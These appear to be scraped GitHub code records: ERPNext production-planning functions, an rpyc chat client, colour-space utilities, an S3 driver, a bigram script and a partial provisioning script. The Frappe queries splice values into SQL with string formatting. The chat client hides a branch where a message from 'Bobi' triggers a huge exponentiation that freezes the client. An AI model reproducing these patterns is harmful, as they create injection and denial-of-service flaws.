planned_end_time=get_datetime(jc_data[0].get('to_time')) + get_mins_between_operations()\n\t\t\t\tremark = \"Workstation {0} is not available for date {1} \".format(jc_data[0].get('workstation'),date_to_be_ready)\n\t\t\t\tdate_dict.update({'planned_start_date':planned_end_time.date(),'remark':remark})\n\t\treturn date_dict\n\n\ndef get_partial_qty(date_to_be_ready, item_code, fg_warehouse_list):\n\tpartial_qty_dict = dict()\n\tcurrent_stock = frappe.db.sql(\"\"\"SELECT item_code, sum(actual_qty) as qty from `tabBin` where warehouse in ({0}) and item_code='{1}' group by item_code \"\"\".format(fg_warehouse_list, item_code),as_dict=1)\n\n\t# update partial_qty_dict\n\tif current_stock:\n\t\tfor row in current_stock:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('item_code'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty')})\n\n\t# Get planned qty from purchase order\n\tplanned_po = frappe.db.sql(\"\"\"SELECT schedule_date, item_code, (qty-received_qty) as qty from `tabPurchase Order Item` where docstatus=1 and schedule_date >= '{0}' and schedule_date <= '{1}' and item_code='{2}' \"\"\".format(date.today(), date_to_be_ready, item_code), as_dict=1)\n\n\t# update partial_qty_dict\n\tif planned_po:\n\t\tfor row in planned_po:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('item_code'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\t\t# keep the latest schedule date seen so far\n\t\t\t\tif not partial_qty_dict.get(\"schedule_date\") or partial_qty_dict.get(\"schedule_date\") < row.get(\"schedule_date\"):\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty'), \"schedule_date\": row.get(\"schedule_date\")})\n\n\t# Get planned qty from material request for which Purchase Order not in place\n\tplanned_mr = frappe.db.sql(\"\"\"SELECT mri.schedule_date, mri.item_code, sum(mri.qty) as qty from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.schedule_date >= '{0}' and mr.schedule_date <= '{1}' and mri.item_code='{2}' and not exists(SELECT po.name from `tabPurchase Order` po join `tabPurchase Order Item` po_item on po_item.parent = po.name where po_item.material_request = mr.name)\"\"\".format(date.today(), date_to_be_ready, item_code),as_dict=1)\n\t# update partial_qty_dict\n\tif planned_mr:\n\t\tfor row in planned_mr:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('item_code'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\t\t# keep the latest schedule date seen so far\n\t\t\t\tif not partial_qty_dict.get(\"schedule_date\") or partial_qty_dict.get(\"schedule_date\") < row.get(\"schedule_date\"):\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty'), \"schedule_date\": row.get(\"schedule_date\")})
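\n\t# build a human-readable remark: how much of the requirement current stock plus open POs/MRs can cover, and by when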
\n\tif partial_qty_dict.get(\"schedule_date\"):\n\t\tschedule_date = get_datetime(partial_qty_dict.get(\"schedule_date\")) + timedelta(1)\n\t\tpartial_remark = \"{0} qty can be completed in planned/available inventory on date {1}.\\n\".format(partial_qty_dict.get(item_code), formatdate(schedule_date, \"mm-dd-yyyy\"))\n\t\tpartial_qty_dict.update({\"partial_remark\":partial_remark})\n\telif partial_qty_dict.get(item_code):\n\t\tpartial_remark = \"{0} qty can be completed in planned/available inventory on date {1}.\\n\".format(partial_qty_dict.get(item_code), formatdate(date.today(), \"mm-dd-yyyy\"))\n\t\tpartial_qty_dict.update({\"partial_remark\":partial_remark})\n\telse:\n\t\tpartial_qty_dict.update({\"partial_remark\":\"\"})\n\treturn partial_qty_dict\n\n\ndef check_partial_workstation_availability(date_to_be_ready,bom, qty):\n\tbom_doc = frappe.get_doc(\"BOM\",bom)\n\tworkstation_availability = dict()\n\tif bom_doc.with_operations:\n\t\tfor row in bom_doc.operations:\n\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.from_time) as from_date, date(jc_time.to_time) as to_date from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) >= '{1}' and date(jc_time.from_time) <= '{2}' and date(jc_time.to_time) >= '{1}' and date(jc_time.to_time) <= '{2}' order by jc_time.to_time desc \"\"\".format(row.workstation, date.today(), date_to_be_ready),as_dict=1)\n\t\t\tif not jc_data:\n\t\t\t\tremark = \"All Workstations are available for date {0}.\".format(formatdate(date.today(), \"mm-dd-yyyy\"))\n\t\t\t\tworkstation_availability.update({'remark':remark})\n\t\t\telif jc_data[0].get('to_date') < date_to_be_ready:\n\t\t\t\tws_date = get_datetime(jc_data[0].get('to_date')) + timedelta(1)\n\t\t\t\tremark = \"Workstation {0} is available for date {1} \".format(jc_data[0].get('workstation'),formatdate(ws_date, \"mm-dd-yyyy\"))\n\t\t\t\tworkstation_availability.update({'remark':remark})\n\t\t\telse:\n\t\t\t\tworkstation_availability.update({'remark':\"\"})\n\t\treturn workstation_availability\n\ndef update_mr_status_in_raw_materials_table(self, mr_doc):\n\tdoc = frappe.get_doc(\"Material Request\", mr_doc)\n\tfor row in doc.items:\n\t\tfrappe.db.set_value(\"Raw Materials Table\", {'item':row.item_code}, \"mr_status\", doc.status)\n\tfrappe.db.commit()\n","repo_name":"indictranstech/rushabhinstruments_V13","sub_path":"instrument/instrument/doctype/production_planning_with_lead_time/production_planning_with_lead_time.py","file_name":"production_planning_with_lead_time.py","file_ext":"py","file_size_in_byte":55091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42235488920","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom exceptions import *\nimport tkinter.simpledialog\nfrom tkinter import ttk\nimport rpyc\nimport queue\nfrom queue import Queue\nfrom queue import Empty\n\n\n\n\nclass GUI2:\n\n port_entry = None\n ip_entry = None\n username_entry = None\n msg_entry = None\n chat_box = None\n online_box = None\n connected_label = None\n conn = None\n\n exposed_username = None\n\n def __init__(self, root):\n self.port_entry = StringVar(value=18812)\n self.ip_entry = StringVar(value='localhost')\n self.username_entry = StringVar(value='Bobi')\n self.connected_label = StringVar(value='...')\n self.to_who = StringVar(value='')\n self.msg_entry = StringVar()\n self.chat_box = None\n self.online_box = None\n\n self.root = root\n\n master = ttk.Frame(root)\n master.pack(padx=10, pady=10)\n\n\n left_panel = Frame(master)
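\n # two-pane layout: a tabbed notebook (Chat / Options) goes in the left panel, the online-users list in the right panel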
\n left_panel.pack(side=LEFT)\n\n right_panel = Frame(master)\n right_panel.pack(fill=BOTH, side=LEFT)\n\n Label(right_panel, text='Online').grid()\n self.online_box = Text(right_panel, width=10, height=5)\n self.online_box.grid(padx=5, pady=4)\n\n Label(right_panel, text=\"To who:\").grid()\n Entry(right_panel, textvariable=self.to_who).grid()\n\n tabs = ttk.Notebook(left_panel)\n\n chat_tab = Frame(tabs)\n chat_tab.pack()\n self.chat_box = Text(chat_tab, width=40, height=15)\n self.chat_box.grid()\n\n sending_box = Frame(chat_tab)\n\n self.msg_entry = Entry(sending_box)\n self.msg_entry.grid(row=0, column=0, sticky=EW)\n Button(sending_box, text='Send', command=self.send_msg).grid(row=0, column=1, sticky='we')\n\n sending_box.grid(sticky=NSEW)\n sending_box.grid_columnconfigure(0, weight=1)\n\n options_tab = Frame(tabs)\n\n login = Frame(options_tab)\n login.pack(expand=True, pady=30)\n Label(login, text='IP').grid(row=0, column=0)\n Label(login, text='Port').grid(row=1, column=0)\n Label(login, text='Username').grid(row=3, column=0)\n Separator(login, orient=HORIZONTAL).grid(row=2, column=0, columnspan=2, sticky=EW, pady=5)\n Entry(login, textvariable=self.ip_entry).grid(row=0, column=1)\n Entry(login, textvariable=self.port_entry).grid(row=1, column=1)\n Entry(login, textvariable=self.username_entry).grid(row=3, column=1)\n Separator(login, orient=HORIZONTAL).grid(row=4, column=0, columnspan=2, sticky=EW, pady=5)\n Button(login, text='Connect', command=self.login).grid(row=5, column=0, columnspan=2)\n Label(login, text='Status:').grid(row=6, column=0, pady=30)\n\n Label(login, textvariable=self.connected_label).grid(row=6, column=1)\n\n tabs.add(chat_tab, text='Chat')\n tabs.add(options_tab, text='Options')\n\n tabs.pack(fill=BOTH, expand=Y)\n\n def login(self):\n ip = self.ip_entry.get()\n port = self.port_entry.get()\n self.exposed_username = self.username_entry.get()\n print('Address', ip, ':', port)\n\n self.c = rpyc.connect(str(ip), str(port))\n try:\n self.conn = self.c.root.connect(self.information)\n except Exception as ee:\n print(ee) # sorry\n self.connected_label.set('Failed!')\n else:\n self.connected_label.set('Connected!')\n self.bgsrv = rpyc.BgServingThread(self.c)\n self.do_list_users()\n\n def add_to_chat(self, text):\n self.chat_box.insert(END, '%s\\n' % text)\n\n # -------------------------- INTERACTION WITH SERVER --------------------------\n\n def send_msg(self):\n text = self.msg_entry.get()\n where = self.to_who.get()\n self.conn.can('msg', [where, text])\n\n def exposed_get_msg(self, msg_data):\n msg_data = dict(msg_data)\n x = 5245353\n if msg_data['who'] == 'Bobi':\n print(312312312**x)\n text = '[{who}]: {what}'.format(**msg_data)\n self.add_to_chat(text)\n\n def do_list_users(self):\n self.conn.can('list_users')\n self.root.after(3000, self.do_list_users)\n\n def exposed_get_list_users(self, users):\n text = ''\n for user in users:\n text += user + '\\n'\n self.online_box.delete(1.0, END)\n self.online_box.insert(END, text)\n\n # -----------------------END OF INTERACTION WITH SERVER --------------------------\n\n @property\n def information(self):\n info = {}\n info['username'] = self.exposed_username\n info['msg'] = self.exposed_get_msg\n info['private_msg'] = self.exposed_get_msg\n info['ping'] = self.exposed_get_msg\n info['list_users'] = self.exposed_get_list_users\n\n return info\nroot = Tk()\n\ngui = 
GUI2(root)\n\n\nroot.title(gui.exposed_username)\ngui.root.mainloop()\n\n\n\ngui.bgsrv.stop()\ngui.c.close()","repo_name":"Boberkraft/python","sub_path":"simple_chat/client/client_main_v2.py","file_name":"client_main_v2.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23509277193","text":"import numpy as np\nfrom scipy.ndimage import gaussian_filter\n\n\n# Add 0 mean Gaussian noise\n# std: Standard deviation in normalized units\n# static: Set to True if same noise should be added to all frames\n# peak: Intensity of brightest pixel\ndef imnoise(clean, std, static=False, peak=None):\n dtype = clean.dtype\n\n if peak is None:\n peak = 1 if dtype.kind == 'f' else np.iinfo(dtype).max\n\n if static:\n # Constant noise for all frames\n h, w, c, N = clean.shape # axis=-1 is frame axis\n noise = np.repeat((np.random.randn(h, w, c, 1)*std), N, axis=-1)\n else:\n noise = np.random.randn(*clean.shape)*std\n noisy = clean.astype(np.float32)/peak + noise\n noisy = (noisy.clip(0, 1)*peak).astype(dtype)\n return noisy\n\n\n# Blur RGB image by applying 2d Gaussian kernel\ndef imgaussblur(clean, sigmas):\n if clean.ndim == 3: # Handle single input image\n clean = clean[...,np.newaxis]\n\n if np.isscalar(sigmas):\n sigmas = np.repeat(sigmas, clean.shape[-1])\n assert sigmas.shape[0] == clean.shape[-1]\n\n blur = np.zeros_like(clean)\n for ff, sigma in enumerate(sigmas): # for each frame\n for cc in range(3): # for each color\n blur[...,cc,ff] = gaussian_filter(clean[...,cc,ff], sigma,\n mode='nearest', truncate=2.0)\n\n return blur.squeeze()\n\n\n# Convert array of images to different datatypes\nuint16to8 = lambda imgs: (np.floor(im/256).astype(np.uint8) for im in imgs)\n# uint16toint16 = lambda imgs: (im.astype(np.int16) for im in imgs)\n# uint16tofp32 = lambda imgs: (im.astype(np.float32)/(2**16 - 1) for im in imgs)\n\n# Below are the functions for colour space transforms \n\ndef lin2pq( L ):\n \"\"\" Convert from absolute linear values (between 0.005 and 10000) to PQ-encoded values V (between 0 and 1)\n \"\"\"\n Lmax = 10000\n #Lmin = 0.005\n n = 0.15930175781250000\n m = 78.843750000000000\n c1 = 0.83593750000000000\n c2 = 18.851562500000000\n c3 = 18.687500000000000\n im_t = np.power(np.clip(L,0,Lmax)/Lmax,n)\n V = np.power((c2*im_t + c1) / (1+c3*im_t), m)\n return V\n\ndef pq2lin( V ):\n \"\"\" Convert from PQ-encoded values V (between 0 and 1) to absolute linear values (between 0.005 and 10000)\n \"\"\"\n Lmax = 10000\n n = 0.15930175781250000\n m = 78.843750000000000\n c1 = 0.83593750000000000\n c2 = 18.851562500000000\n c3 = 18.687500000000000\n\n im_t = np.power(np.maximum(V,0),1/m)\n L = Lmax * np.power(np.maximum(im_t-c1,0)/(c2-c3*im_t), 1/n) \n return L\n\ndef srgb2lin( p ):\n t = 0.04045\n a = 0.055\n p = p.clip(0,1)\n L = np.where( p<=t, p/12.92, ((p+a)/(1+a))**2.4 )\n return L\n\ndef lin2srgb( L ):\n t = 0.0031308\n a = 0.055\n L = L.clip(0,1)\n p = np.where( L<=t, L*12.92, (1+a)*(L)**(1/2.4) - a )\n return p\n\n__xyz2lms = np.array( [ [0.3592, 0.6976, -0.0358],\\\n [-0.1922, 1.1004, 0.0755], \\\n [0.0070, 0.0749, 0.8434] ] )\n\n__lms2ICtCp = np.array( [ [0.5000, 0.5000, 0.0000], \\\n [1.6137, -3.3234, 1.7097], \\\n [4.3780, -4.2455, -0.1325] ] )\n\n__ICtCp2lms = np.array( [ [1, 0.0086, 0.1110], \\\n [1, -0.0086, -0.1110], \\\n [1, 0.5600, -0.3206] ] )\n__lms2xyz = np.array( [ [2.0702, -1.3265, 0.2066], \\\n [0.3650, 0.6805, -0.0454], \\\n [-0.0496, -0.0494, 1.1880] ] )\n\ndef 
xyz2itp(xyz):\n itp = im_ctrans(lin2pq(im_ctrans(xyz,M=__xyz2lms)),M=__lms2ICtCp)\n return itp\n\ndef lms2itp(lms):\n itp = im_ctrans(lin2pq(lms),M=__lms2ICtCp)\n return itp\n\ndef itp2lms(itp):\n lms = pq2lin(im_ctrans(itp,M=__ICtCp2lms))\n return lms\n\n\ndef xyz2Yxy(col_vec):\n assert(col_vec.shape[1]==3)\n sum = np.sum(col_vec,axis=1)\n return np.stack( (col_vec[:,1], col_vec[:,0]/sum, col_vec[:,1]/sum), axis=1)\n\ndef Yxy2xyz(col_vec):\n assert(col_vec.shape[1]==3)\n return np.stack( (col_vec[:,0]*col_vec[:,1]/col_vec[:,2], \\\n col_vec[:,0], \\\n col_vec[:,0]/col_vec[:,2]*(1-col_vec[:,1]-col_vec[:,2])), axis=1)\n\ndef im2colvec(im):\n \"\"\" Convert an image ([height width 3] array) into a colour vector ([height*width 3] array)\n \"\"\"\n if im.ndim==2 and im.shape[1]==3: # Already a colour vector\n return im\n\n assert(im.shape[2]==3)\n npix = im.shape[0]*im.shape[1]\n return im.reshape( (npix, 3), order='F' )\n\ndef colvec2im(colvec, shape):\n \"\"\" Convert a colour vector ([height*width 3] array) into an image ([height width 3] array)\n \"\"\"\n if colvec.ndim==3 and colvec.shape[2]==3: # Already an image\n return colvec\n\n assert(colvec.shape[1]==3)\n return colvec.reshape( shape, order='F' )\n\n\n__rgb2020_2xyz = np.array( [ [0.6370, 0.1446, 0.1689], \\\n [0.2627, 0.6780, 0.0593], \\\n [0.0000, 0.0281, 1.0610] ] )\n\n\n__rgb709_2xyz = np.array( [ [0.4124, 0.3576, 0.1805], \\\n [0.2126, 0.7152, 0.0722], \\\n [0.0193, 0.1192, 0.9505] ] )\n\n__xyz2rgb2020 = np.array( [ [ 1.716502508360628, -0.355584689096764, -0.253375213570850], \\\n [-0.666625609145029, 1.616446566522207, 0.015775479726511], \\\n [0.017655211703087, -0.042810696059636, 0.942089263920533] ] )\n\n__xyz2rgb709 = np.array( [ [3.2406, -1.5372, -0.4986], \\\n [-0.9689, 1.8758, 0.0415], \\\n [0.0557, -0.2040, 1.0570] ] )\n\n# Get colour transform from \"fromCS\" to \"toCS\".
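\n# For example, get_cform(\"rgb709\", \"xyz\") below returns the 3x3 matrix taking linear BT.709 RGB to XYZ.\n# 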
CIE XYZ 1931 is used as an intermediate colour space\ndef get_cform( fromCS, toCS ):\n\n # Get the transform from 'fromCS' to XYZ\n if fromCS==\"rgb2020\":\n in2xyz = __rgb2020_2xyz\n elif fromCS==\"rgb709\":\n in2xyz = __rgb709_2xyz\n elif fromCS==\"xyz\":\n in2xyz = np.eye(3,3)\n else:\n assert( False ) # Not recognized colour space\n\n if toCS==\"rgb2020\":\n xyz2out = __xyz2rgb2020\n elif toCS==\"rgb709\":\n xyz2out = __xyz2rgb709\n elif toCS==\"lms\":\n xyz2out = __xyz2lms\n elif toCS==\"xyz\":\n xyz2out = np.eye(3,3)\n else:\n assert( False ) # Not recognized colour space\n\n return xyz2out @ in2xyz\n\n# Recipes for converting from a given colour space to CIE XYZ 1931\n# First value - non-linear conversion function (or None), second - colour conversion matrix \n__to_xyz_cforms = { \n \"rgb2020\" : (None, __rgb2020_2xyz),\n \"rgb709\" : (None, __rgb709_2xyz),\n \"xyz\" : (None, np.eye(3,3)),\n \"pq_rgb\" : (pq2lin, __rgb2020_2xyz),\n \"srgb\" : (srgb2lin, __rgb709_2xyz),\n \"Yxy\" : (Yxy2xyz, np.eye(3,3)),\n \"itp\" : (itp2lms, __lms2xyz)\n}\n\n# Recipes for converting from CIE XYZ 1931 to a given colour space \n# First value - colour transform matrix, second column - non-linear conversion function (or None)\n__from_xyz_cforms = { \n \"rgb2020\" : (__xyz2rgb2020, None),\n \"rgb709\" : (__xyz2rgb709, None),\n \"xyz\" : (np.eye(3,3), None),\n \"pq_rgb\" : (__xyz2rgb2020, lin2pq),\n \"srgb\" : (__xyz2rgb709, lin2srgb),\n \"Yxy\" : (np.eye(3,3), xyz2Yxy),\n \"itp\" : (__xyz2lms, lms2itp)\n}\n\ndef im_ctrans( im, fromCS=None, toCS=None, M=None, exposure=1 ):\n \"\"\"Transform an image or a colour vector from one colour space into another\n Parameters:\n in - either an image as (width, height, 3) array or (n, 3) colour vector\n fromCS, toCS - strings with the name of the input and output colour spaces. \n Linear colour spaces: rgb709, rgb2020, xyz, \n Non-linear colour spaces: pq_rgb (BT.2020), srgb (BT.709), Yxy\n M - if fromCS and toCS are not specified, you must pass the colour transformation matrix as M \n (default is None)\n exposure - The colour values are multiplied (in linear space) by the value of the `exposure`. \n Default is 1. This parameter is useful when converting between relative and absolute \n colour spaces, for example:\n\n im_ctrans(im, \"srgb\", \"pq_rgb\", exposure=100)\n\n will map peak white (1,1,1) in sRGB to (100,100,100) or 100 cd/m^2 D65 in BT.2020. 
\n\n Returns:\n An image or colour vector in the new colour space.\n \"\"\"\n\n col_vec = im2colvec(im)\n\n if fromCS:\n assert fromCS in __to_xyz_cforms, \"Unknown colour space\"\n nl_func, in2xyz = __to_xyz_cforms[fromCS] \n if nl_func:\n col_vec = nl_func(col_vec)\n \n if toCS:\n assert toCS in __from_xyz_cforms, \"Unknown colour space\"\n xyz2out, to_nl_func = __from_xyz_cforms[toCS]\n else:\n to_nl_func = None\n\n if M is None:\n M = xyz2out @ in2xyz\n\n col_vec_out = col_vec @ (M.transpose().astype(col_vec.dtype) * exposure)\n\n if to_nl_func: # Non-linearity, if needed\n col_vec_out = to_nl_func(col_vec_out)\n\n if im.ndim==3: # an image\n im_out = col_vec_out.reshape( im.shape, order='F' )\n else:\n im_out = col_vec_out\n\n return im_out\n\n\n# This looks like BT.601 to me, not 709: https://en.wikipedia.org/wiki/YCbCr \n\n_ycbcr2rgb_rec709 = np.array([[1, 0, 1.402],\n [1, -0.344136, -0.714136],\n [1, 1.772, 0]], dtype=np.float32) # This is rec 709 space\n \n_rgb_rec7092ycbcr = np.array([[0.298999944347618, 0.587000125991912, 0.113999929660470],\\\n [-0.168735860241319, -0.331264179453675, 0.500000039694994],\\\n [0.500000039694994, -0.418687679024188, -0.081312360670806]], dtype=np.float32)\n\n \n\ndef srgb2ycbcr(RGB):\n width = RGB.shape[1]\n height = RGB.shape[0]\n pix_count = width*height\n YUV = (np.reshape( RGB, (pix_count, 3), order='F' ) @ _rgb_rec7092ycbcr.transpose()).reshape( (height, width, 3 ), order='F' )\n return YUV\n\ndef ycbcr2srgb(YUV):\n width = YUV.shape[1]\n height = YUV.shape[0]\n pix_count = width*height\n RGB = (np.reshape( YUV, (pix_count, 3), order='F' ) @ _ycbcr2rgb_rec709.transpose()).reshape( (height, width, 3 ), order='F' )\n return RGB\n","repo_name":"gfxdisp/ColorVideoVDP","sub_path":"examples/ex_utils.py","file_name":"ex_utils.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"17848790812","text":"\"\"\"\n.. note::\n This driver requires `boto3`_.\n\nConfiguration\n~~~~~~~~~~~~~\n\n.. code-block:: yaml\n\n ---\n gridscale:\n driver: gridscale\n aws_access_key_id: \n aws_secret_access_key: \n region: \n\nYou can manually set ``endpoint_url`` or use a region below as shortcut:\n\n- ``de/fra2`` (gos3.io)\n- ``ch/app1`` (bc01.gos3.io)\n- ``nl/ams1`` (ce21.gos3.io)\n\nSee the `official tutorial`_ for more details.\n\n.. _boto3: https://github.com/boto/boto3\n.. 
_official tutorial: https://gridscale.io/en/community/tutorials/quick-guide-s3-compatible-object-storage/\n\"\"\"\nfrom os_benchmark.drivers import s3\n\n\nclass Driver(s3.Driver):\n \"\"\"Gridscale S3 Driver\"\"\"\n id = 'gridscale'\n\n ENDPOINTS = {\n 'de/fra2': 'gos3.io',\n 'ch/app1': 'bc01.gos3.io',\n 'nl/ams1': 'ce21.gos3.io',\n }\n\n def __init__(self, *args, **kwargs):\n if 'region' in kwargs:\n self.region = kwargs.pop('region')\n endpoint_url = 'https://%s' % self.ENDPOINTS[self.region]\n kwargs.setdefault('endpoint_url', endpoint_url)\n super().__init__(*args, **kwargs)\n\n def get_url(self, bucket_id, name, **kwargs):\n url = '%s/%s/%s' % (\n self.kwargs['endpoint_url'],\n bucket_id,\n name,\n )\n return url\n","repo_name":"cloudmercato/os-benchmark","sub_path":"os_benchmark/drivers/gridscale.py","file_name":"gridscale.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"26508648709","text":"# -*- coding: utf-8 -*-\nfrom nltk.util import ngrams\nfrom nltk.tokenize import word_tokenize\nimport codecs\n\nbigram_set = set()\n\n\ndef process_bigrams(text):\n tokens = text.split()\n ngram = ngrams(tokens,2)\n for i in ngram:\n print(i)\n bigram_set.add(i)\n\n\ntweets = codecs.open('Tweets.txt', 'r').readlines()\n# map() is lazy in Python 3; iterate explicitly so bigram_set is actually populated\nfor tweet in tweets:\n process_bigrams(tweet)\nwith open('Bigrams.txt', 'w') as fw:\n for bigram in bigram_set:\n print('Bigram is : ',bigram)\n fw.write('%s\\n' % str(bigram))","repo_name":"ankitrajshree/NLP_Processings_Scripts","sub_path":"Bigram_Extractor.py","file_name":"Bigram_Extractor.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72911673689","text":"import logging\nimport os\nfrom time import sleep\nfrom uuid import uuid4\n\nimport django\nfrom django.conf import settings\nfrom fabric.api import local\n\nfrom snailshell_cp.clients.portainer import PortainerClient\nfrom snailshell_cp.management.cluster_control.utils import (\n HOST_PG_DIR,\n HOST_SSH_DIR,\n generate_local_ssh_key,\n jdump,\n reset_docker\n)\n\nfrom .base import CommandRunError, cp_task, create_environment\n\nlogger = logging.getLogger(__name__)\n\n\ndef _setup_portainer():\n local( # start Portainer\n f'docker run -d '\n f'-p {settings.ENV.PORTAINER_PORT}:9000 --restart always '\n f'-v /var/run/docker.sock:/var/run/docker.sock '\n f'-v /opt/portainer:/data '\n f'--name {settings.ENV.PORTAINER_DOCKER_CONTAINER_NAME} '\n f'{settings.ENV.PORTAINER_IMAGE_NAME}:{settings.ENV.PORTAINER_IMAGE_TAG}',\n )\n\n sleep(2) # TODO\n\n\ndef _get_portainer_client():\n logger.info('Initializing Portainer...')\n portainer_client = PortainerClient(settings.ENV.PORTAINER_EXTERNAL_URL)\n portainer_client.init_admin(\n settings.ENV.PORTAINER_ADMIN_USER,\n settings.ENV.PORTAINER_ADMIN_PASSWORD,\n )\n portainer_client.authenticate(\n settings.ENV.PORTAINER_ADMIN_USER,\n settings.ENV.PORTAINER_ADMIN_PASSWORD,\n )\n portainer_client.add_endpoint(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_NAME,\n settings.ENV.DOCKER_LOCAL_SOCKET_PATH,\n )\n return portainer_client\n\n\ndef _apply_migrations():\n attempts_left = 20\n\n while True:\n sleep(3)\n\n try:\n local('python3 manage.py migrate --noinput')\n break\n except CommandRunError as exc:\n logger.info(\n 'Failed to apply migrations. 
Attempts left: %s',\n attempts_left,\n )\n\n attempts_left -= 1\n\n if attempts_left == 0:\n raise Exception('Can\\'t connect to DB after 60 seconds')\n\n\ndef _setup_postgres(portainer_client):\n postgres_env = {\n 'POSTGRES_USER': '$POSTGRES_USER',\n 'POSTGRES_PASSWORD': '$POSTGRES_PASSWORD',\n 'POSTGRES_DB': '$POSTGRES_DBNAME_CONTROL_PANEL',\n }\n host_config = {\n 'PortBindings': {\n '5432/tcp': [{'HostPort': str(settings.ENV.POSTGRES_PORT)}],\n },\n 'Binds': [\n f'{HOST_PG_DIR}:/var/lib/postgresql/data',\n ],\n }\n volumes = {'/var/lib/postgresql/data': {}}\n\n logger.info('Setting up Postgres...')\n portainer_client.create_image(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_IMAGE_NAME,\n settings.ENV.POSTGRES_IMAGE_TAG,\n )\n portainer_client.create_container(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_IMAGE_NAME,\n settings.ENV.POSTGRES_IMAGE_TAG,\n name=settings.ENV.POSTGRES_CONTAINER_NAME,\n request_data={\n 'Env': create_environment(postgres_env, include_all=False),\n 'HostConfig': host_config,\n 'RestartPolicy': {'Name': 'unless-stopped'},\n 'Volumes': volumes,\n },\n )\n portainer_client.start_container(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_CONTAINER_NAME,\n )\n\n django.setup()\n\n logger.info('Filling DB with initial data...')\n from snailshell_cp.models import Node, AccessKey, PERMISSION_DEPLOY, Service\n from django.contrib.auth.models import User\n\n _apply_migrations()\n\n User.objects.create_superuser(\n username=settings.ENV.CONTROL_PANEL_ADMIN_USER,\n email=f'{settings.ENV.CONTROL_PANEL_ADMIN_USER}@localhost',\n password=settings.ENV.CONTROL_PANEL_ADMIN_PASSWORD,\n )\n logger.info(\n f'Successfully created user {settings.ENV.CONTROL_PANEL_ADMIN_USER}',\n )\n\n node = Node.objects.create(\n id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n name=settings.ENV.PORTAINER_LOCAL_ENDPOINT_NAME,\n # These fields are never used for the local node\n host='localhost',\n port=0,\n )\n logger.info(f'Successfully created Node {node}')\n\n AccessKey.objects.create(\n permissions=PERMISSION_DEPLOY,\n value=settings.ENV.CONTROL_PANEL_DEFAULT_DEPLOY_KEY or uuid4().hex,\n )\n\n Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.POSTGRES_IMAGE_NAME,\n default_image_tag=settings.ENV.POSTGRES_IMAGE_TAG,\n container_name=settings.ENV.POSTGRES_CONTAINER_NAME,\n is_system_service=True,\n env_variables=jdump(postgres_env),\n host_config=jdump(host_config),\n volumes=jdump(volumes),\n )\n\n\ndef _setup_rabbitmq(portainer_client):\n logger.info('Setting up RabbitMQ...')\n from snailshell_cp.models import Service, DeployJob\n from snailshell_cp.tasks import deploy_container\n\n service = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.RABBITMQ_IMAGE_NAME,\n default_image_tag=settings.ENV.RABBITMQ_IMAGE_TAG,\n container_name=settings.ENV.RABBITMQ_CONTAINER_NAME,\n is_system_service=True,\n env_variables=jdump({\n 'RABBITMQ_DEFAULT_USER': '$RABBITMQ_USER',\n 'RABBITMQ_DEFAULT_PASS': '$RABBITMQ_PASSWORD',\n }),\n host_config=jdump({\n 'PortBindings': {\n '5672/tcp': [\n {'HostPort': str(settings.ENV.RABBITMQ_PORT)},\n ],\n '15672/tcp': [\n {'HostPort': str(settings.ENV.RABBITMQ_MANAGEMENT_PORT)},\n ],\n },\n\n }),\n )\n\n deploy_job = DeployJob.objects.create(\n service=service,\n )\n deploy_container(\n deploy_job_id=deploy_job.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n\ndef 
